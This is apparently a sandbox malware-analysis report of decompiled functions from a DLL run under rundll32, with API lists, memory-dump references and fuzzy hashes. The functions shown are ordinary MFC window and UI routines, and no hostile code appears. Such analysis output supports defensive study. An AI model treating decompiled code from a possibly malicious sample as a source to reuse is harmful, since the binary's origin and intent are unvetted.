                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 10013845
                                                                                                        • GetSysColorBrush.USER32(00000006), ref: 1001384C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$Brush
                                                                                                        • String ID:
                                                                                                        • API String ID: 2798902688-0
                                                                                                        • Opcode ID: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
                                                                                                        • Instruction ID: 74b272bfbd302397870cb0a2abf86f81c97ca9371361d4e5ce15514e9afb48cd
                                                                                                        • Opcode Fuzzy Hash: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
                                                                                                        • Instruction Fuzzy Hash: E8F01C71940748ABE730BF728D49B47BAE5FFC4B10F12092ED2858BA90E6B6E041DF40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10028DE5() {
                                                                                                        				long _t5;
                                                                                                        				int _t6;
                                                                                                        
                                                                                                        				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
                                                                                                        					_t5 = GetVersion();
                                                                                                        					if((0x80000000 & _t5) != 0) {
                                                                                                        						L5:
                                                                                                        						 *0x1005acc4 =  *0x1005acc4 & 0x00000000;
                                                                                                        						return _t5;
                                                                                                        					}
                                                                                                        					_t5 = GetVersion();
                                                                                                        					if(_t5 != 3) {
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        					goto L4;
                                                                                                        				} else {
                                                                                                        					L4:
                                                                                                        					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
                                                                                                        					 *0x1005acc4 = _t6;
                                                                                                        					return _t6;
                                                                                                        				}
                                                                                                        			}





                                                                                                        0x10028df6
                                                                                                        0x10028e00
                                                                                                        0x10028e04
                                                                                                        0x10028e20
                                                                                                        0x10028e20
                                                                                                        0x00000000
                                                                                                        0x10028e20
                                                                                                        0x10028e06
                                                                                                        0x10028e0c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10028e0e
                                                                                                        0x10028e0e
                                                                                                        0x10028e13
                                                                                                        0x10028e19
                                                                                                        0x00000000
                                                                                                        0x10028e19

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Version$MessageRegisterWindow
                                                                                                        • String ID: MSWHEEL_ROLLMSG
                                                                                                        • API String ID: 303823969-2485103130
                                                                                                        • Opcode ID: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
                                                                                                        • Instruction ID: a1cfe5ae80d7d924f96357e0403be069d270e7200ca7c890729efff85db7b39d
                                                                                                        • Opcode Fuzzy Hash: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
                                                                                                        • Instruction Fuzzy Hash: 34E0D83E80213792F700A374AD0034939D5DB442E0F930066ED0042258CB24098747A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 81%
                                                                                                        			E1000C209(void* __ecx, void* __edx, void* __eflags) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t37;
                                                                                                        				signed int _t54;
                                                                                                        				intOrPtr _t57;
                                                                                                        				long _t60;
                                                                                                        				struct HWND__* _t63;
                                                                                                        				CHAR* _t64;
                                                                                                        				void* _t65;
                                                                                                        				void* _t67;
                                                                                                        				void* _t71;
                                                                                                        				void* _t72;
                                                                                                        				long _t73;
                                                                                                        				void* _t74;
                                                                                                        				void* _t75;
                                                                                                        				signed int _t77;
                                                                                                        				void* _t78;
                                                                                                        				signed int _t79;
                                                                                                        				void* _t81;
                                                                                                        
                                                                                                        				_t71 = __edx;
                                                                                                        				_t79 = _t81 - 0x9c;
                                                                                                        				_t37 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				 *(_t79 + 0x98) = _t37 ^ _t79;
                                                                                                        				_t73 =  *(_t79 + 0xa4);
                                                                                                        				_t77 = 0;
                                                                                                        				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
                                                                                                        				E1000C12A(0);
                                                                                                        				_t67 = _t72;
                                                                                                        				_t63 = E1000C15E(0, _t79 - 0x70);
                                                                                                        				 *(_t79 - 0x7c) = _t63;
                                                                                                        				if(_t63 !=  *(_t79 - 0x70)) {
                                                                                                        					EnableWindow(_t63, 1);
                                                                                                        				}
                                                                                                        				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
                                                                                                        				GetWindowThreadProcessId(_t63, _t79 - 0x78);
                                                                                                        				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
                                                                                                        					L6:
                                                                                                        					__eflags = _t73;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						_t77 = _t73 + 0x78;
                                                                                                        					}
                                                                                                        					goto L8;
                                                                                                        				} else {
                                                                                                        					_t60 = SendMessageA(_t63, 0x376, 0, 0);
                                                                                                        					if(_t60 == 0) {
                                                                                                        						goto L6;
                                                                                                        					} else {
                                                                                                        						_t77 = _t60;
                                                                                                        						L8:
                                                                                                        						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
                                                                                                        						if(_t77 != 0) {
                                                                                                        							 *(_t79 - 0x74) =  *_t77;
                                                                                                        							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
                                                                                                        							if(_t57 != 0) {
                                                                                                        								 *_t77 = _t57 + 0x30000;
                                                                                                        							}
                                                                                                        						}
                                                                                                        						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
                                                                                                        							_t54 =  *(_t79 + 0xac) & 0x0000000f;
                                                                                                        							if(_t54 <= 1) {
                                                                                                        								_t24 = _t79 + 0xac;
                                                                                                        								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
                                                                                                        								__eflags =  *_t24;
                                                                                                        							} else {
                                                                                                        								if(_t54 + 0xfffffffd <= 1) {
                                                                                                        									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t96 = _t73;
                                                                                                        						 *(_t79 - 0x6c) = 0;
                                                                                                        						if(_t73 == 0) {
                                                                                                        							_t64 = _t79 - 0x6c;
                                                                                                        							_t73 = 0x104;
                                                                                                        							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								 *((char*)(_t79 + 0x97)) = 0;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							_t64 =  *(_t73 + 0x50);
                                                                                                        						}
                                                                                                        						_push( *(_t79 + 0xac));
                                                                                                        						_push(_t64);
                                                                                                        						_push( *((intOrPtr*)(_t79 - 0x80)));
                                                                                                        						_push( *(_t79 - 0x7c));
                                                                                                        						_t74 = E1000C093(_t64, _t67, _t73, _t77, _t96);
                                                                                                        						if(_t77 != 0) {
                                                                                                        							 *_t77 =  *(_t79 - 0x74);
                                                                                                        						}
                                                                                                        						if( *(_t79 - 0x70) != 0) {
                                                                                                        							EnableWindow( *(_t79 - 0x70), 1);
                                                                                                        						}
                                                                                                        						E1000C12A(1);
                                                                                                        						_pop(_t75);
                                                                                                        						_pop(_t78);
                                                                                                        						_pop(_t65);
                                                                                                        						return E100167D5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}
























                                                                                                        0x1000c209
                                                                                                        0x1000c20a
                                                                                                        0x1000c217
                                                                                                        0x1000c21e
                                                                                                        0x1000c22d
                                                                                                        0x1000c233
                                                                                                        0x1000c236
                                                                                                        0x1000c239
                                                                                                        0x1000c23e
                                                                                                        0x1000c249
                                                                                                        0x1000c24e
                                                                                                        0x1000c251
                                                                                                        0x1000c256
                                                                                                        0x1000c256
                                                                                                        0x1000c25c
                                                                                                        0x1000c264
                                                                                                        0x1000c26c
                                                                                                        0x1000c291
                                                                                                        0x1000c291
                                                                                                        0x1000c293
                                                                                                        0x1000c295
                                                                                                        0x1000c295
                                                                                                        0x00000000
                                                                                                        0x1000c279
                                                                                                        0x1000c283
                                                                                                        0x1000c28b
                                                                                                        0x00000000
                                                                                                        0x1000c28d
                                                                                                        0x1000c28d
                                                                                                        0x1000c298
                                                                                                        0x1000c298
                                                                                                        0x1000c29e
                                                                                                        0x1000c2a2
                                                                                                        0x1000c2a5
                                                                                                        0x1000c2ad
                                                                                                        0x1000c2b4
                                                                                                        0x1000c2b4
                                                                                                        0x1000c2ad
                                                                                                        0x1000c2bd
                                                                                                        0x1000c2c5
                                                                                                        0x1000c2cb
                                                                                                        0x1000c2de
                                                                                                        0x1000c2de
                                                                                                        0x1000c2de
                                                                                                        0x1000c2cd
                                                                                                        0x1000c2d3
                                                                                                        0x1000c2d5
                                                                                                        0x1000c2d5
                                                                                                        0x1000c2d3
                                                                                                        0x1000c2cb
                                                                                                        0x1000c2e5
                                                                                                        0x1000c2e7
                                                                                                        0x1000c2eb
                                                                                                        0x1000c2f2
                                                                                                        0x1000c2f5
                                                                                                        0x1000c306
                                                                                                        0x1000c308
                                                                                                        0x1000c30a
                                                                                                        0x1000c30a
                                                                                                        0x1000c2ed
                                                                                                        0x1000c2ed
                                                                                                        0x1000c2ed
                                                                                                        0x1000c311
                                                                                                        0x1000c317
                                                                                                        0x1000c318
                                                                                                        0x1000c31b
                                                                                                        0x1000c328
                                                                                                        0x1000c32a
                                                                                                        0x1000c32f
                                                                                                        0x1000c32f
                                                                                                        0x1000c335
                                                                                                        0x1000c33c
                                                                                                        0x1000c33c
                                                                                                        0x1000c344
                                                                                                        0x1000c352
                                                                                                        0x1000c353
                                                                                                        0x1000c356
                                                                                                        0x1000c363
                                                                                                        0x1000c363
                                                                                                        0x1000c28b

                                                                                                        APIs
                                                                                                          • Part of subcall function 1000C15E: GetParent.USER32(100014EC), ref: 1000C1B1
                                                                                                          • Part of subcall function 1000C15E: GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
                                                                                                          • Part of subcall function 1000C15E: IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
                                                                                                          • Part of subcall function 1000C15E: EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 1000C256
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 1000C264
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 1000C26E
                                                                                                        • SendMessageA.USER32 ref: 1000C283
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000C300
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 1000C33C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1877664794-0
                                                                                                        • Opcode ID: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
                                                                                                        • Instruction ID: 906afa4fd5bad6b09c7d7bb12576003d117f5a582180c2333a3862cf80afbe79
                                                                                                        • Opcode Fuzzy Hash: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
                                                                                                        • Instruction Fuzzy Hash: A1416A32A0035C9FFB31CFA58C85FDD7BA8EF05390F210129E949AB286D7709A408B50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000C15E(struct HWND__* _a4, struct HWND__** _a8) {
                                                                                                        				struct HWND__* _t7;
                                                                                                        				void* _t13;
                                                                                                        				struct HWND__** _t15;
                                                                                                        				struct HWND__* _t16;
                                                                                                        				struct HWND__* _t17;
                                                                                                        				struct HWND__* _t18;
                                                                                                        
                                                                                                        				_t18 = _a4;
                                                                                                        				_t17 = _t18;
                                                                                                        				if(_t18 != 0) {
                                                                                                        					L5:
                                                                                                        					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                        						L8:
                                                                                                        						_t16 = _t17;
                                                                                                        						_t7 = _t17;
                                                                                                        						if(_t17 == 0) {
                                                                                                        							L10:
                                                                                                        							if(_t18 == 0 && _t17 != 0) {
                                                                                                        								_t17 = GetLastActivePopup(_t17);
                                                                                                        							}
                                                                                                        							_t15 = _a8;
                                                                                                        							if(_t15 != 0) {
                                                                                                        								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                                                                        									 *_t15 =  *_t15 & 0x00000000;
                                                                                                        								} else {
                                                                                                        									 *_t15 = _t16;
                                                                                                        									EnableWindow(_t16, 0);
                                                                                                        								}
                                                                                                        							}
                                                                                                        							return _t17;
                                                                                                        						} else {
                                                                                                        							goto L9;
                                                                                                        						}
                                                                                                        						do {
                                                                                                        							L9:
                                                                                                        							_t16 = _t7;
                                                                                                        							_t7 = GetParent(_t7);
                                                                                                        						} while (_t7 != 0);
                                                                                                        						goto L10;
                                                                                                        					}
                                                                                                        					_t17 = GetParent(_t17);
                                                                                                        					L7:
                                                                                                        					if(_t17 != 0) {
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        					goto L8;
                                                                                                        				}
                                                                                                        				_t13 = E1000C087();
                                                                                                        				if(_t13 != 0) {
                                                                                                        					L4:
                                                                                                        					_t17 =  *(_t13 + 0x20);
                                                                                                        					goto L7;
                                                                                                        				}
                                                                                                        				_t13 = E1000A7CE();
                                                                                                        				if(_t13 != 0) {
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				_t17 = 0;
                                                                                                        				goto L8;
                                                                                                        			}









                                                                                                        0x1000c166
                                                                                                        0x1000c16e
                                                                                                        0x1000c170
                                                                                                        0x1000c18d
                                                                                                        0x1000c19b
                                                                                                        0x1000c1a6
                                                                                                        0x1000c1a8
                                                                                                        0x1000c1aa
                                                                                                        0x1000c1ac
                                                                                                        0x1000c1b7
                                                                                                        0x1000c1b9
                                                                                                        0x1000c1c6
                                                                                                        0x1000c1c6
                                                                                                        0x1000c1c8
                                                                                                        0x1000c1ce
                                                                                                        0x1000c1d2
                                                                                                        0x1000c1f0
                                                                                                        0x1000c1e3
                                                                                                        0x1000c1e6
                                                                                                        0x1000c1e8
                                                                                                        0x1000c1e8
                                                                                                        0x1000c1d2
                                                                                                        0x1000c1f9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c1ae
                                                                                                        0x1000c1ae
                                                                                                        0x1000c1af
                                                                                                        0x1000c1b1
                                                                                                        0x1000c1b3
                                                                                                        0x00000000
                                                                                                        0x1000c1ae
                                                                                                        0x1000c1a0
                                                                                                        0x1000c1a2
                                                                                                        0x1000c1a4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c1a4
                                                                                                        0x1000c172
                                                                                                        0x1000c179
                                                                                                        0x1000c188
                                                                                                        0x1000c188
                                                                                                        0x00000000
                                                                                                        0x1000c188
                                                                                                        0x1000c17b
                                                                                                        0x1000c182
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c184
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetWindowLongA.USER32 ref: 1000C190
                                                                                                        • GetParent.USER32(100014EC), ref: 1000C19E
                                                                                                        • GetParent.USER32(100014EC), ref: 1000C1B1
                                                                                                        • GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
                                                                                                        • IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
                                                                                                        • EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                        • String ID:
                                                                                                        • API String ID: 670545878-0
                                                                                                        • Opcode ID: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
                                                                                                        • Instruction ID: b03ffd99d979528eb1576ebd7f6c5d6629826c0934e428a14188cd3025a76a69
                                                                                                        • Opcode Fuzzy Hash: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
                                                                                                        • Instruction Fuzzy Hash: CC11A33264533A57F221DB698C80F9A72ECDF4BAD0F260129FC44E329ADB60DC0242D5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 38%
                                                                                                        			E1001411A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                                                                        				struct tagRECT _v20;
                                                                                                        				struct HWND__* _t12;
                                                                                                        				struct HWND__* _t21;
                                                                                                        
                                                                                                        				ClientToScreen(_a4,  &_a8);
                                                                                                        				_push(5);
                                                                                                        				_push(_a4);
                                                                                                        				while(1) {
                                                                                                        					_t12 = GetWindow();
                                                                                                        					_t21 = _t12;
                                                                                                        					if(_t21 == 0) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                                                                        						GetWindowRect(_t21,  &_v20);
                                                                                                        						_push(_a12);
                                                                                                        						if(PtInRect( &_v20, _a8) != 0) {
                                                                                                        							return _t21;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_push(2);
                                                                                                        					_push(_t21);
                                                                                                        				}
                                                                                                        				return _t12;
                                                                                                        			}






                                                                                                        0x10014129
                                                                                                        0x10014135
                                                                                                        0x10014137
                                                                                                        0x1001417a
                                                                                                        0x1001417a
                                                                                                        0x1001417c
                                                                                                        0x10014180
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014146
                                                                                                        0x1001415d
                                                                                                        0x10014163
                                                                                                        0x10014175
                                                                                                        0x00000000
                                                                                                        0x10014188
                                                                                                        0x10014175
                                                                                                        0x10014177
                                                                                                        0x10014179
                                                                                                        0x10014179
                                                                                                        0x10014185

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1315500227-0
                                                                                                        • Opcode ID: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
                                                                                                        • Instruction ID: 106842abd73dbf2249684b53af78e8d9c6ae05809ec90903e9ae8d6f26667822
                                                                                                        • Opcode Fuzzy Hash: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
                                                                                                        • Instruction Fuzzy Hash: AA014F36500126BBDB12DF658C48EDE77ACEF15791F124114F911AA1A0DB30DA82CA94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E10012406(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				char* _v20;
                                                                                                        				signed int _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v40;
                                                                                                        				intOrPtr _v52;
                                                                                                        				signed int _v56;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr _t122;
                                                                                                        				void* _t128;
                                                                                                        				intOrPtr _t130;
                                                                                                        				signed int _t139;
                                                                                                        				signed int _t144;
                                                                                                        				signed int _t175;
                                                                                                        				signed int _t177;
                                                                                                        				signed int _t179;
                                                                                                        				signed int _t181;
                                                                                                        				signed int _t183;
                                                                                                        				signed int _t187;
                                                                                                        				void* _t190;
                                                                                                        				intOrPtr _t191;
                                                                                                        				signed int _t201;
                                                                                                        
                                                                                                        				_t190 = __ecx;
                                                                                                        				_t122 = E1000D5EC(__ebx, __edi, __esi, __eflags);
                                                                                                        				_v8 = _t122;
                                                                                                        				_t3 =  &_a4;
                                                                                                        				 *_t3 = _a4 &  !( *(_t122 + 0x18));
                                                                                                        				if( *_t3 == 0) {
                                                                                                        					return 1;
                                                                                                        				}
                                                                                                        				_push(__ebx);
                                                                                                        				_push(__esi);
                                                                                                        				_push(__edi);
                                                                                                        				_t201 = 0;
                                                                                                        				E100174D0(0,  &_v56, 0, 0x28);
                                                                                                        				_v52 = DefWindowProcA;
                                                                                                        				_t128 = E1000D5EC(__ebx, 0, 0, __eflags);
                                                                                                        				__eflags = _a4 & 0x00000001;
                                                                                                        				_v40 =  *((intOrPtr*)(_t128 + 8));
                                                                                                        				_t130 =  *0x1005aa70; // 0x10003
                                                                                                        				_t187 = 8;
                                                                                                        				_v32 = _t130;
                                                                                                        				_v16 = _t187;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_push( &_v56);
                                                                                                        					_v56 = 0xb;
                                                                                                        					_v20 = "AfxWnd80s";
                                                                                                        					_t183 = E10012222(_t187, _t190, 0, 0, __eflags);
                                                                                                        					__eflags = _t183;
                                                                                                        					if(_t183 != 0) {
                                                                                                        						_t201 = 1;
                                                                                                        						__eflags = 1;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000020;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v56 = _v56 | 0x0000008b;
                                                                                                        					_push( &_v56);
                                                                                                        					_v20 = "AfxOleControl80s";
                                                                                                        					_t181 = E10012222(_t187, _t190, 0, _t201, __eflags);
                                                                                                        					__eflags = _t181;
                                                                                                        					if(_t181 != 0) {
                                                                                                        						_t201 = _t201 | 0x00000020;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000002;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_push( &_v56);
                                                                                                        					_v56 = 0;
                                                                                                        					_v20 = "AfxControlBar80s";
                                                                                                        					_v28 = 0x10;
                                                                                                        					_t179 = E10012222(_t187, _t190, 0, _t201, __eflags);
                                                                                                        					__eflags = _t179;
                                                                                                        					if(_t179 != 0) {
                                                                                                        						_t201 = _t201 | 0x00000002;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000004;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v56 = _t187;
                                                                                                        					_v28 = 0;
                                                                                                        					_t177 = E100123C5(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
                                                                                                        					__eflags = _t177;
                                                                                                        					if(_t177 != 0) {
                                                                                                        						_t201 = _t201 | 0x00000004;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & _t187;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v56 = 0xb;
                                                                                                        					_v28 = 6;
                                                                                                        					_t175 = E100123C5(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
                                                                                                        					__eflags = _t175;
                                                                                                        					if(_t175 != 0) {
                                                                                                        						_t201 = _t201 | _t187;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000010;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0xff;
                                                                                                        					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
                                                                                                        					_t48 =  &_a4;
                                                                                                        					 *_t48 = _a4 & 0xffffc03f;
                                                                                                        					__eflags =  *_t48;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000040;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x10;
                                                                                                        					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000080;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 2;
                                                                                                        					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000100;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = _t187;
                                                                                                        					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000200;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x20;
                                                                                                        					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000400;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 1;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000800;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x40;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00001000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 4;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00002000;
                                                                                                        				if(__eflags != 0) {
